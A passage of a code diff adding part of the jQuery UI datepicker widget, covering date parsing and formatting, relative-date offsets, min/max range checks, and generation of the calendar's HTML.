+			shortYearCutoffTemp = (settings ? settings.shortYearCutoff : null) || this._defaults.shortYearCutoff,
+			shortYearCutoff = (typeof shortYearCutoffTemp !== "string" ? shortYearCutoffTemp :
+				new Date().getFullYear() % 100 + parseInt(shortYearCutoffTemp, 10)),
+			dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort,
+			dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames,
+			monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort,
+			monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames,
+			year = -1,
+			month = -1,
+			day = -1,
+			doy = -1,
+			literal = false,
+			date,
+			// Check whether a format character is doubled
+			lookAhead = function(match) {
+				var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match);
+				if (matches) {
+					iFormat++;
+				}
+				return matches;
+			},
+			// Extract a number from the string value
+			getNumber = function(match) {
+				var isDoubled = lookAhead(match),
+					size = (match === "@" ? 14 : (match === "!" ? 20 :
+					(match === "y" && isDoubled ? 4 : (match === "o" ? 3 : 2)))),
+					minSize = (match === "y" ? size : 1),
+					digits = new RegExp("^\\d{" + minSize + "," + size + "}"),
+					num = value.substring(iValue).match(digits);
+				if (!num) {
+					throw "Missing number at position " + iValue;
+				}
+				iValue += num[0].length;
+				return parseInt(num[0], 10);
+			},
+			// Extract a name from the string value and convert to an index
+			getName = function(match, shortNames, longNames) {
+				var index = -1,
+					names = $.map(lookAhead(match) ? longNames : shortNames, function (v, k) {
+						return [ [k, v] ];
+					}).sort(function (a, b) {
+						return -(a[1].length - b[1].length);
+					});
+
+				$.each(names, function (i, pair) {
+					var name = pair[1];
+					if (value.substr(iValue, name.length).toLowerCase() === name.toLowerCase()) {
+						index = pair[0];
+						iValue += name.length;
+						return false;
+					}
+				});
+				if (index !== -1) {
+					return index + 1;
+				} else {
+					throw "Unknown name at position " + iValue;
+				}
+			},
+			// Confirm that a literal character matches the string value
+			checkLiteral = function() {
+				if (value.charAt(iValue) !== format.charAt(iFormat)) {
+					throw "Unexpected literal at position " + iValue;
+				}
+				iValue++;
+			};
+
+		for (iFormat = 0; iFormat < format.length; iFormat++) {
+			if (literal) {
+				if (format.charAt(iFormat) === "'" && !lookAhead("'")) {
+					literal = false;
+				} else {
+					checkLiteral();
+				}
+			} else {
+				switch (format.charAt(iFormat)) {
+					case "d":
+						day = getNumber("d");
+						break;
+					case "D":
+						getName("D", dayNamesShort, dayNames);
+						break;
+					case "o":
+						doy = getNumber("o");
+						break;
+					case "m":
+						month = getNumber("m");
+						break;
+					case "M":
+						month = getName("M", monthNamesShort, monthNames);
+						break;
+					case "y":
+						year = getNumber("y");
+						break;
+					case "@":
+						date = new Date(getNumber("@"));
+						year = date.getFullYear();
+						month = date.getMonth() + 1;
+						day = date.getDate();
+						break;
+					case "!":
+						date = new Date((getNumber("!") - this._ticksTo1970) / 10000);
+						year = date.getFullYear();
+						month = date.getMonth() + 1;
+						day = date.getDate();
+						break;
+					case "'":
+						if (lookAhead("'")){
+							checkLiteral();
+						} else {
+							literal = true;
+						}
+						break;
+					default:
+						checkLiteral();
+				}
+			}
+		}
+
+		if (iValue < value.length){
+			extra = value.substr(iValue);
+			if (!/^\s+/.test(extra)) {
+				throw "Extra/unparsed characters found in date: " + extra;
+			}
+		}
+
+		if (year === -1) {
+			year = new Date().getFullYear();
+		} else if (year < 100) {
+			year += new Date().getFullYear() - new Date().getFullYear() % 100 +
+				(year <= shortYearCutoff ? 0 : -100);
+		}
+
+		if (doy > -1) {
+			month = 1;
+			day = doy;
+			do {
+				dim = this._getDaysInMonth(year, month - 1);
+				if (day <= dim) {
+					break;
+				}
+				month++;
+				day -= dim;
+			} while (true);
+		}
+
+		date = this._daylightSavingAdjust(new Date(year, month - 1, day));
+		if (date.getFullYear() !== year || date.getMonth() + 1 !== month || date.getDate() !== day) {
+			throw "Invalid date"; // E.g. 31/02/00
+		}
+		return date;
+	},
+
+	/* Standard date formats. */
+	ATOM: "yy-mm-dd", // RFC 3339 (ISO 8601)
+	COOKIE: "D, dd M yy",
+	ISO_8601: "yy-mm-dd",
+	RFC_822: "D, d M y",
+	RFC_850: "DD, dd-M-y",
+	RFC_1036: "D, d M y",
+	RFC_1123: "D, d M yy",
+	RFC_2822: "D, d M yy",
+	RSS: "D, d M y", // RFC 822
+	TICKS: "!",
+	TIMESTAMP: "@",
+	W3C: "yy-mm-dd", // ISO 8601
+
+	_ticksTo1970: (((1970 - 1) * 365 + Math.floor(1970 / 4) - Math.floor(1970 / 100) +
+		Math.floor(1970 / 400)) * 24 * 60 * 60 * 10000000),
+
+	/* Format a date object into a string value.
+	 * The format can be combinations of the following:
+	 * d  - day of month (no leading zero)
+	 * dd - day of month (two digit)
+	 * o  - day of year (no leading zeros)
+	 * oo - day of year (three digit)
+	 * D  - day name short
+	 * DD - day name long
+	 * m  - month of year (no leading zero)
+	 * mm - month of year (two digit)
+	 * M  - month name short
+	 * MM - month name long
+	 * y  - year (two digit)
+	 * yy - year (four digit)
+	 * @ - Unix timestamp (ms since 01/01/1970)
+	 * ! - Windows ticks (100ns since 01/01/0001)
+	 * "..." - literal text
+	 * '' - single quote
+	 *
+	 * @param  format string - the desired format of the date
+	 * @param  date Date - the date value to format
+	 * @param  settings Object - attributes include:
+	 *					dayNamesShort	string[7] - abbreviated names of the days from Sunday (optional)
+	 *					dayNames		string[7] - names of the days from Sunday (optional)
+	 *					monthNamesShort string[12] - abbreviated names of the months (optional)
+	 *					monthNames		string[12] - names of the months (optional)
+	 * @return  string - the date in the above format
+	 */
+	formatDate: function (format, date, settings) {
+		if (!date) {
+			return "";
+		}
+
+		var iFormat,
+			dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort,
+			dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames,
+			monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort,
+			monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames,
+			// Check whether a format character is doubled
+			lookAhead = function(match) {
+				var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match);
+				if (matches) {
+					iFormat++;
+				}
+				return matches;
+			},
+			// Format a number, with leading zero if necessary
+			formatNumber = function(match, value, len) {
+				var num = "" + value;
+				if (lookAhead(match)) {
+					while (num.length < len) {
+						num = "0" + num;
+					}
+				}
+				return num;
+			},
+			// Format a name, short or long as requested
+			formatName = function(match, value, shortNames, longNames) {
+				return (lookAhead(match) ? longNames[value] : shortNames[value]);
+			},
+			output = "",
+			literal = false;
+
+		if (date) {
+			for (iFormat = 0; iFormat < format.length; iFormat++) {
+				if (literal) {
+					if (format.charAt(iFormat) === "'" && !lookAhead("'")) {
+						literal = false;
+					} else {
+						output += format.charAt(iFormat);
+					}
+				} else {
+					switch (format.charAt(iFormat)) {
+						case "d":
+							output += formatNumber("d", date.getDate(), 2);
+							break;
+						case "D":
+							output += formatName("D", date.getDay(), dayNamesShort, dayNames);
+							break;
+						case "o":
+							output += formatNumber("o",
+								Math.round((new Date(date.getFullYear(), date.getMonth(), date.getDate()).getTime() - new Date(date.getFullYear(), 0, 0).getTime()) / 86400000), 3);
+							break;
+						case "m":
+							output += formatNumber("m", date.getMonth() + 1, 2);
+							break;
+						case "M":
+							output += formatName("M", date.getMonth(), monthNamesShort, monthNames);
+							break;
+						case "y":
+							output += (lookAhead("y") ? date.getFullYear() :
+								(date.getYear() % 100 < 10 ? "0" : "") + date.getYear() % 100);
+							break;
+						case "@":
+							output += date.getTime();
+							break;
+						case "!":
+							output += date.getTime() * 10000 + this._ticksTo1970;
+							break;
+						case "'":
+							if (lookAhead("'")) {
+								output += "'";
+							} else {
+								literal = true;
+							}
+							break;
+						default:
+							output += format.charAt(iFormat);
+					}
+				}
+			}
+		}
+		return output;
+	},
+
+	/* Extract all possible characters from the date format. */
+	_possibleChars: function (format) {
+		var iFormat,
+			chars = "",
+			literal = false,
+			// Check whether a format character is doubled
+			lookAhead = function(match) {
+				var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match);
+				if (matches) {
+					iFormat++;
+				}
+				return matches;
+			};
+
+		for (iFormat = 0; iFormat < format.length; iFormat++) {
+			if (literal) {
+				if (format.charAt(iFormat) === "'" && !lookAhead("'")) {
+					literal = false;
+				} else {
+					chars += format.charAt(iFormat);
+				}
+			} else {
+				switch (format.charAt(iFormat)) {
+					case "d": case "m": case "y": case "@":
+						chars += "0123456789";
+						break;
+					case "D": case "M":
+						return null; // Accept anything
+					case "'":
+						if (lookAhead("'")) {
+							chars += "'";
+						} else {
+							literal = true;
+						}
+						break;
+					default:
+						chars += format.charAt(iFormat);
+				}
+			}
+		}
+		return chars;
+	},
+
+	/* Get a setting value, defaulting if necessary. */
+	_get: function(inst, name) {
+		return inst.settings[name] !== undefined ?
+			inst.settings[name] : this._defaults[name];
+	},
+
+	/* Parse existing date and initialise date picker. */
+	_setDateFromField: function(inst, noDefault) {
+		if (inst.input.val() === inst.lastVal) {
+			return;
+		}
+
+		var dateFormat = this._get(inst, "dateFormat"),
+			dates = inst.lastVal = inst.input ? inst.input.val() : null,
+			defaultDate = this._getDefaultDate(inst),
+			date = defaultDate,
+			settings = this._getFormatConfig(inst);
+
+		try {
+			date = this.parseDate(dateFormat, dates, settings) || defaultDate;
+		} catch (event) {
+			dates = (noDefault ? "" : dates);
+		}
+		inst.selectedDay = date.getDate();
+		inst.drawMonth = inst.selectedMonth = date.getMonth();
+		inst.drawYear = inst.selectedYear = date.getFullYear();
+		inst.currentDay = (dates ? date.getDate() : 0);
+		inst.currentMonth = (dates ? date.getMonth() : 0);
+		inst.currentYear = (dates ? date.getFullYear() : 0);
+		this._adjustInstDate(inst);
+	},
+
+	/* Retrieve the default date shown on opening. */
+	_getDefaultDate: function(inst) {
+		return this._restrictMinMax(inst,
+			this._determineDate(inst, this._get(inst, "defaultDate"), new Date()));
+	},
+
+	/* A date may be specified as an exact value or a relative one. */
+	_determineDate: function(inst, date, defaultDate) {
+		var offsetNumeric = function(offset) {
+				var date = new Date();
+				date.setDate(date.getDate() + offset);
+				return date;
+			},
+			offsetString = function(offset) {
+				try {
+					return $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"),
+						offset, $.datepicker._getFormatConfig(inst));
+				}
+				catch (e) {
+					// Ignore
+				}
+
+				var date = (offset.toLowerCase().match(/^c/) ?
+					$.datepicker._getDate(inst) : null) || new Date(),
+					year = date.getFullYear(),
+					month = date.getMonth(),
+					day = date.getDate(),
+					pattern = /([+\-]?[0-9]+)\s*(d|D|w|W|m|M|y|Y)?/g,
+					matches = pattern.exec(offset);
+
+				while (matches) {
+					switch (matches[2] || "d") {
+						case "d" : case "D" :
+							day += parseInt(matches[1],10); break;
+						case "w" : case "W" :
+							day += parseInt(matches[1],10) * 7; break;
+						case "m" : case "M" :
+							month += parseInt(matches[1],10);
+							day = Math.min(day, $.datepicker._getDaysInMonth(year, month));
+							break;
+						case "y": case "Y" :
+							year += parseInt(matches[1],10);
+							day = Math.min(day, $.datepicker._getDaysInMonth(year, month));
+							break;
+					}
+					matches = pattern.exec(offset);
+				}
+				return new Date(year, month, day);
+			},
+			newDate = (date == null || date === "" ? defaultDate : (typeof date === "string" ? offsetString(date) :
+				(typeof date === "number" ? (isNaN(date) ? defaultDate : offsetNumeric(date)) : new Date(date.getTime()))));
+
+		newDate = (newDate && newDate.toString() === "Invalid Date" ? defaultDate : newDate);
+		if (newDate) {
+			newDate.setHours(0);
+			newDate.setMinutes(0);
+			newDate.setSeconds(0);
+			newDate.setMilliseconds(0);
+		}
+		return this._daylightSavingAdjust(newDate);
+	},
+
+	/* Handle switch to/from daylight saving.
+	 * Hours may be non-zero on daylight saving cut-over:
+	 * > 12 when midnight changeover, but then cannot generate
+	 * midnight datetime, so jump to 1AM, otherwise reset.
+	 * @param  date  (Date) the date to check
+	 * @return  (Date) the corrected date
+	 */
+	_daylightSavingAdjust: function(date) {
+		if (!date) {
+			return null;
+		}
+		date.setHours(date.getHours() > 12 ? date.getHours() + 2 : 0);
+		return date;
+	},
+
+	/* Set the date(s) directly. */
+	_setDate: function(inst, date, noChange) {
+		var clear = !date,
+			origMonth = inst.selectedMonth,
+			origYear = inst.selectedYear,
+			newDate = this._restrictMinMax(inst, this._determineDate(inst, date, new Date()));
+
+		inst.selectedDay = inst.currentDay = newDate.getDate();
+		inst.drawMonth = inst.selectedMonth = inst.currentMonth = newDate.getMonth();
+		inst.drawYear = inst.selectedYear = inst.currentYear = newDate.getFullYear();
+		if ((origMonth !== inst.selectedMonth || origYear !== inst.selectedYear) && !noChange) {
+			this._notifyChange(inst);
+		}
+		this._adjustInstDate(inst);
+		if (inst.input) {
+			inst.input.val(clear ? "" : this._formatDate(inst));
+		}
+	},
+
+	/* Retrieve the date(s) directly. */
+	_getDate: function(inst) {
+		var startDate = (!inst.currentYear || (inst.input && inst.input.val() === "") ? null :
+			this._daylightSavingAdjust(new Date(
+			inst.currentYear, inst.currentMonth, inst.currentDay)));
+			return startDate;
+	},
+
+	/* Attach the onxxx handlers.  These are declared statically so
+	 * they work with static code transformers like Caja.
+	 */
+	_attachHandlers: function(inst) {
+		var stepMonths = this._get(inst, "stepMonths"),
+			id = "#" + inst.id.replace( /\\\\/g, "\\" );
+		inst.dpDiv.find("[data-handler]").map(function () {
+			var handler = {
+				prev: function () {
+					$.datepicker._adjustDate(id, -stepMonths, "M");
+				},
+				next: function () {
+					$.datepicker._adjustDate(id, +stepMonths, "M");
+				},
+				hide: function () {
+					$.datepicker._hideDatepicker();
+				},
+				today: function () {
+					$.datepicker._gotoToday(id);
+				},
+				selectDay: function () {
+					$.datepicker._selectDay(id, +this.getAttribute("data-month"), +this.getAttribute("data-year"), this);
+					return false;
+				},
+				selectMonth: function () {
+					$.datepicker._selectMonthYear(id, this, "M");
+					return false;
+				},
+				selectYear: function () {
+					$.datepicker._selectMonthYear(id, this, "Y");
+					return false;
+				}
+			};
+			$(this).bind(this.getAttribute("data-event"), handler[this.getAttribute("data-handler")]);
+		});
+	},
+
+	/* Generate the HTML for the current state of the date picker. */
+	_generateHTML: function(inst) {
+		var maxDraw, prevText, prev, nextText, next, currentText, gotoDate,
+			controls, buttonPanel, firstDay, showWeek, dayNames, dayNamesMin,
+			monthNames, monthNamesShort, beforeShowDay, showOtherMonths,
+			selectOtherMonths, defaultDate, html, dow, row, group, col, selectedDate,
+			cornerClass, calender, thead, day, daysInMonth, leadDays, curRows, numRows,
+			printDate, dRow, tbody, daySettings, otherMonth, unselectable,
+			tempDate = new Date(),
+			today = this._daylightSavingAdjust(
+				new Date(tempDate.getFullYear(), tempDate.getMonth(), tempDate.getDate())), // clear time
+			isRTL = this._get(inst, "isRTL"),
+			showButtonPanel = this._get(inst, "showButtonPanel"),
+			hideIfNoPrevNext = this._get(inst, "hideIfNoPrevNext"),
+			navigationAsDateFormat = this._get(inst, "navigationAsDateFormat"),
+			numMonths = this._getNumberOfMonths(inst),
+			showCurrentAtPos = this._get(inst, "showCurrentAtPos"),
+			stepMonths = this._get(inst, "stepMonths"),
+			isMultiMonth = (numMonths[0] !== 1 || numMonths[1] !== 1),
+			currentDate = this._daylightSavingAdjust((!inst.currentDay ? new Date(9999, 9, 9) :
+				new Date(inst.currentYear, inst.currentMonth, inst.currentDay))),
+			minDate = this._getMinMaxDate(inst, "min"),
+			maxDate = this._getMinMaxDate(inst, "max"),
+			drawMonth = inst.drawMonth - showCurrentAtPos,
+			drawYear = inst.drawYear;
+
+		if (drawMonth < 0) {
+			drawMonth += 12;
+			drawYear--;
+		}
+		if (maxDate) {
+			maxDraw = this._daylightSavingAdjust(new Date(maxDate.getFullYear(),
+				maxDate.getMonth() - (numMonths[0] * numMonths[1]) + 1, maxDate.getDate()));
+			maxDraw = (minDate && maxDraw < minDate ? minDate : maxDraw);
+			while (this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1)) > maxDraw) {
+				drawMonth--;
+				if (drawMonth < 0) {
+					drawMonth = 11;
+					drawYear--;
+				}
+			}
+		}
+		inst.drawMonth = drawMonth;
+		inst.drawYear = drawYear;
+
+		prevText = this._get(inst, "prevText");
+		prevText = (!navigationAsDateFormat ? prevText : this.formatDate(prevText,
+			this._daylightSavingAdjust(new Date(drawYear, drawMonth - stepMonths, 1)),
+			this._getFormatConfig(inst)));
+
+		prev = (this._canAdjustMonth(inst, -1, drawYear, drawMonth) ?
+			"<a class='ui-datepicker-prev ui-corner-all' data-handler='prev' data-event='click'" +
+			" title='" + prevText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>" :
+			(hideIfNoPrevNext ? "" : "<a class='ui-datepicker-prev ui-corner-all ui-state-disabled' title='"+ prevText +"'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>"));
+
+		nextText = this._get(inst, "nextText");
+		nextText = (!navigationAsDateFormat ? nextText : this.formatDate(nextText,
+			this._daylightSavingAdjust(new Date(drawYear, drawMonth + stepMonths, 1)),
+			this._getFormatConfig(inst)));
+
+		next = (this._canAdjustMonth(inst, +1, drawYear, drawMonth) ?
+			"<a class='ui-datepicker-next ui-corner-all' data-handler='next' data-event='click'" +
+			" title='" + nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>" :
+			(hideIfNoPrevNext ? "" : "<a class='ui-datepicker-next ui-corner-all ui-state-disabled' title='"+ nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>"));
+
+		currentText = this._get(inst, "currentText");
+		gotoDate = (this._get(inst, "gotoCurrent") && inst.currentDay ? currentDate : today);
+		currentText = (!navigationAsDateFormat ? currentText :
+			this.formatDate(currentText, gotoDate, this._getFormatConfig(inst)));
+
+		controls = (!inst.inline ? "<button type='button' class='ui-datepicker-close ui-state-default ui-priority-primary ui-corner-all' data-handler='hide' data-event='click'>" +
+			this._get(inst, "closeText") + "</button>" : "");
+
+		buttonPanel = (showButtonPanel) ? "<div class='ui-datepicker-buttonpane ui-widget-content'>" + (isRTL ? controls : "") +
+			(this._isInRange(inst, gotoDate) ? "<button type='button' class='ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all' data-handler='today' data-event='click'" +
+			">" + currentText + "</button>" : "") + (isRTL ? "" : controls) + "</div>" : "";
+
+		firstDay = parseInt(this._get(inst, "firstDay"),10);
+		firstDay = (isNaN(firstDay) ? 0 : firstDay);
+
+		showWeek = this._get(inst, "showWeek");
+		dayNames = this._get(inst, "dayNames");
+		dayNamesMin = this._get(inst, "dayNamesMin");
+		monthNames = this._get(inst, "monthNames");
+		monthNamesShort = this._get(inst, "monthNamesShort");
+		beforeShowDay = this._get(inst, "beforeShowDay");
+		showOtherMonths = this._get(inst, "showOtherMonths");
+		selectOtherMonths = this._get(inst, "selectOtherMonths");
+		defaultDate = this._getDefaultDate(inst);
+		html = "";
+		dow;
+		for (row = 0; row < numMonths[0]; row++) {
+			group = "";
+			this.maxRows = 4;
+			for (col = 0; col < numMonths[1]; col++) {
+				selectedDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, inst.selectedDay));
+				cornerClass = " ui-corner-all";
+				calender = "";
+				if (isMultiMonth) {
+					calender += "<div class='ui-datepicker-group";
+					if (numMonths[1] > 1) {
+						switch (col) {
+							case 0: calender += " ui-datepicker-group-first";
+								cornerClass = " ui-corner-" + (isRTL ? "right" : "left"); break;
+							case numMonths[1]-1: calender += " ui-datepicker-group-last";
+								cornerClass = " ui-corner-" + (isRTL ? "left" : "right"); break;
+							default: calender += " ui-datepicker-group-middle"; cornerClass = ""; break;
+						}
+					}
+					calender += "'>";
+				}
+				calender += "<div class='ui-datepicker-header ui-widget-header ui-helper-clearfix" + cornerClass + "'>" +
+					(/all|left/.test(cornerClass) && row === 0 ? (isRTL ? next : prev) : "") +
+					(/all|right/.test(cornerClass) && row === 0 ? (isRTL ? prev : next) : "") +
+					this._generateMonthYearHeader(inst, drawMonth, drawYear, minDate, maxDate,
+					row > 0 || col > 0, monthNames, monthNamesShort) + // draw month headers
+					"</div><table class='ui-datepicker-calendar'><thead>" +
+					"<tr>";
+				thead = (showWeek ? "<th class='ui-datepicker-week-col'>" + this._get(inst, "weekHeader") + "</th>" : "");
+				for (dow = 0; dow < 7; dow++) { // days of the week
+					day = (dow + firstDay) % 7;
+					thead += "<th scope='col'" + ((dow + firstDay + 6) % 7 >= 5 ? " class='ui-datepicker-week-end'" : "") + ">" +
+						"<span title='" + dayNames[day] + "'>" + dayNamesMin[day] + "</span></th>";
+				}
+				calender += thead + "</tr></thead><tbody>";
+				daysInMonth = this._getDaysInMonth(drawYear, drawMonth);
+				if (drawYear === inst.selectedYear && drawMonth === inst.selectedMonth) {
+					inst.selectedDay = Math.min(inst.selectedDay, daysInMonth);
+				}
+				leadDays = (this._getFirstDayOfMonth(drawYear, drawMonth) - firstDay + 7) % 7;
+				curRows = Math.ceil((leadDays + daysInMonth) / 7); // calculate the number of rows to generate
+				numRows = (isMultiMonth ? this.maxRows > curRows ? this.maxRows : curRows : curRows); //If multiple months, use the higher number of rows (see #7043)
+				this.maxRows = numRows;
+				printDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1 - leadDays));
+				for (dRow = 0; dRow < numRows; dRow++) { // create date picker rows
+					calender += "<tr>";
+					tbody = (!showWeek ? "" : "<td class='ui-datepicker-week-col'>" +
+						this._get(inst, "calculateWeek")(printDate) + "</td>");
+					for (dow = 0; dow < 7; dow++) { // create date picker days
+						daySettings = (beforeShowDay ?
+							beforeShowDay.apply((inst.input ? inst.input[0] : null), [printDate]) : [true, ""]);
+						otherMonth = (printDate.getMonth() !== drawMonth);
+						unselectable = (otherMonth && !selectOtherMonths) || !daySettings[0] ||
+							(minDate && printDate < minDate) || (maxDate && printDate > maxDate);
+						tbody += "<td class='" +
+							((dow + firstDay + 6) % 7 >= 5 ? " ui-datepicker-week-end" : "") + // highlight weekends
+							(otherMonth ? " ui-datepicker-other-month" : "") + // highlight days from other months
+							((printDate.getTime() === selectedDate.getTime() && drawMonth === inst.selectedMonth && inst._keyEvent) || // user pressed key
+							(defaultDate.getTime() === printDate.getTime() && defaultDate.getTime() === selectedDate.getTime()) ?
+							// or defaultDate is current printedDate and defaultDate is selectedDate
+							" " + this._dayOverClass : "") + // highlight selected day
+							(unselectable ? " " + this._unselectableClass + " ui-state-disabled": "") +  // highlight unselectable days
+							(otherMonth && !showOtherMonths ? "" : " " + daySettings[1] + // highlight custom dates
+							(printDate.getTime() === currentDate.getTime() ? " " + this._currentClass : "") + // highlight selected day
+							(printDate.getTime() === today.getTime() ? " ui-datepicker-today" : "")) + "'" + // highlight today (if different)
+							((!otherMonth || showOtherMonths) && daySettings[2] ? " title='" + daySettings[2].replace(/'/g, "&#39;") + "'" : "") + // cell title
+							(unselectable ? "" : " data-handler='selectDay' data-event='click' data-month='" + printDate.getMonth() + "' data-year='" + printDate.getFullYear() + "'") + ">" + // actions
+							(otherMonth && !showOtherMonths ? "&#xa0;" : // display for other months
+							(unselectable ? "<span class='ui-state-default'>" + printDate.getDate() + "</span>" : "<a class='ui-state-default" +
+							(printDate.getTime() === today.getTime() ? " ui-state-highlight" : "") +
+							(printDate.getTime() === currentDate.getTime() ? " ui-state-active" : "") + // highlight selected day
+							(otherMonth ? " ui-priority-secondary" : "") + // distinguish dates from other months
+							"' href='#'>" + printDate.getDate() + "</a>")) + "</td>"; // display selectable date
+						printDate.setDate(printDate.getDate() + 1);
+						printDate = this._daylightSavingAdjust(printDate);
+					}
+					calender += tbody + "</tr>";
+				}
+				drawMonth++;
+				if (drawMonth > 11) {
+					drawMonth = 0;
+					drawYear++;
+				}
+				calender += "</tbody></table>" + (isMultiMonth ? "</div>" +
+							((numMonths[0] > 0 && col === numMonths[1]-1) ? "<div class='ui-datepicker-row-break'></div>" : "") : "");
+				group += calender;
+			}
+			html += group;
+		}
+		html += buttonPanel;
+		inst._keyEvent = false;
+		return html;
+	},
+
+	/* Generate the month and year header. */
+	_generateMonthYearHeader: function(inst, drawMonth, drawYear, minDate, maxDate,
+			secondary, monthNames, monthNamesShort) {
+
+		var inMinYear, inMaxYear, month, years, thisYear, determineYear, year, endYear,
+			changeMonth = this._get(inst, "changeMonth"),
+			changeYear = this._get(inst, "changeYear"),
+			showMonthAfterYear = this._get(inst, "showMonthAfterYear"),
+			html = "<div class='ui-datepicker-title'>",
+			monthHtml = "";
+
+		// month selection
+		if (secondary || !changeMonth) {
+			monthHtml += "<span class='ui-datepicker-month'>" + monthNames[drawMonth] + "</span>";
+		} else {
+			inMinYear = (minDate && minDate.getFullYear() === drawYear);
+			inMaxYear = (maxDate && maxDate.getFullYear() === drawYear);
+			monthHtml += "<select class='ui-datepicker-month' data-handler='selectMonth' data-event='change'>";
+			for ( month = 0; month < 12; month++) {
+				if ((!inMinYear || month >= minDate.getMonth()) && (!inMaxYear || month <= maxDate.getMonth())) {
+					monthHtml += "<option value='" + month + "'" +
+						(month === drawMonth ? " selected='selected'" : "") +
+						">" + monthNamesShort[month] + "</option>";
+				}
+			}
+			monthHtml += "</select>";
+		}
+
+		if (!showMonthAfterYear) {
+			html += monthHtml + (secondary || !(changeMonth && changeYear) ? "&#xa0;" : "");
+		}
+
+		// year selection
+		if ( !inst.yearshtml ) {
+			inst.yearshtml = "";
+			if (secondary || !changeYear) {
+				html += "<span class='ui-datepicker-year'>" + drawYear + "</span>";
+			} else {
+				// determine range of years to display
+				years = this._get(inst, "yearRange").split(":");
+				thisYear = new Date().getFullYear();
+				determineYear = function(value) {
+					var year = (value.match(/c[+\-].*/) ? drawYear + parseInt(value.substring(1), 10) :
+						(value.match(/[+\-].*/) ? thisYear + parseInt(value, 10) :
+						parseInt(value, 10)));
+					return (isNaN(year) ? thisYear : year);
+				};
+				year = determineYear(years[0]);
+				endYear = Math.max(year, determineYear(years[1] || ""));
+				year = (minDate ? Math.max(year, minDate.getFullYear()) : year);
+				endYear = (maxDate ? Math.min(endYear, maxDate.getFullYear()) : endYear);
+				inst.yearshtml += "<select class='ui-datepicker-year' data-handler='selectYear' data-event='change'>";
+				for (; year <= endYear; year++) {
+					inst.yearshtml += "<option value='" + year + "'" +
+						(year === drawYear ? " selected='selected'" : "") +
+						">" + year + "</option>";
+				}
+				inst.yearshtml += "</select>";
+
+				html += inst.yearshtml;
+				inst.yearshtml = null;
+			}
+		}
+
+		html += this._get(inst, "yearSuffix");
+		if (showMonthAfterYear) {
+			html += (secondary || !(changeMonth && changeYear) ? "&#xa0;" : "") + monthHtml;
+		}
+		html += "</div>"; // Close datepicker_header
+		return html;
+	},
+
+	/* Adjust one of the date sub-fields. */
+	_adjustInstDate: function(inst, offset, period) {
+		var year = inst.drawYear + (period === "Y" ? offset : 0),
+			month = inst.drawMonth + (period === "M" ? offset : 0),
+			day = Math.min(inst.selectedDay, this._getDaysInMonth(year, month)) + (period === "D" ? offset : 0),
+			date = this._restrictMinMax(inst, this._daylightSavingAdjust(new Date(year, month, day)));
+
+		inst.selectedDay = date.getDate();
+		inst.drawMonth = inst.selectedMonth = date.getMonth();
+		inst.drawYear = inst.selectedYear = date.getFullYear();
+		if (period === "M" || period === "Y") {
+			this._notifyChange(inst);
+		}
+	},
+
+	/* Ensure a date is within any min/max bounds. */
+	_restrictMinMax: function(inst, date) {
+		var minDate = this._getMinMaxDate(inst, "min"),
+			maxDate = this._getMinMaxDate(inst, "max"),
+			newDate = (minDate && date < minDate ? minDate : date);
+		return (maxDate && newDate > maxDate ? maxDate : newDate);
+	},
+
+	/* Notify change of month/year. */
+	_notifyChange: function(inst) {
+		var onChange = this._get(inst, "onChangeMonthYear");
+		if (onChange) {
+			onChange.apply((inst.input ? inst.input[0] : null),
+				[inst.selectedYear, inst.selectedMonth + 1, inst]);
+		}
+	},
+
+	/* Determine the number of months to show. */
+	_getNumberOfMonths: function(inst) {
+		var numMonths = this._get(inst, "numberOfMonths");
+		return (numMonths == null ? [1, 1] : (typeof numMonths === "number" ? [1, numMonths] : numMonths));
+	},
+
+	/* Determine the current maximum date - ensure no time components are set. */
+	_getMinMaxDate: function(inst, minMax) {
+		return this._determineDate(inst, this._get(inst, minMax + "Date"), null);
+	},
+
+	/* Find the number of days in a given month. */
+	_getDaysInMonth: function(year, month) {
+		return 32 - this._daylightSavingAdjust(new Date(year, month, 32)).getDate();
+	},
+
+	/* Find the day of the week of the first of a month. */
+	_getFirstDayOfMonth: function(year, month) {
+		return new Date(year, month, 1).getDay();
+	},
+
+	/* Determines if we should allow a "next/prev" month display change. */
+	_canAdjustMonth: function(inst, offset, curYear, curMonth) {
+		var numMonths = this._getNumberOfMonths(inst),
+			date = this._daylightSavingAdjust(new Date(curYear,
+			curMonth + (offset < 0 ? offset : numMonths[0] * numMonths[1]), 1));
+
+		if (offset < 0) {
+			date.setDate(this._getDaysInMonth(date.getFullYear(), date.getMonth()));
+		}
+		return this._isInRange(inst, date);
+	},
+
+	/* Is the given date in the accepted range? */
+	_isInRange: function(inst, date) {
+		var yearSplit, currentYear,
+			minDate = this._getMinMaxDate(inst, "min"),
+			maxDate = this._getMinMaxDate(inst, "max"),
+			minYear = null,
+			maxYear = null,
+			years = this._get(inst, "yearRange");
+			if (years){
+				yearSplit = years.split(":");
+				currentYear = new Date().getFullYear();
+				minYear = parseInt(yearSplit[0], 10);
+				maxYear = parseInt(yearSplit[1], 10);
+				if ( yearSplit[0].match(/[+\-].*/) ) {
+					minYear += currentYear;
+				}
+				if ( yearSplit[1].match(/[+\-].*/) ) {
+					maxYear += currentYear;
+				}
+			}
+
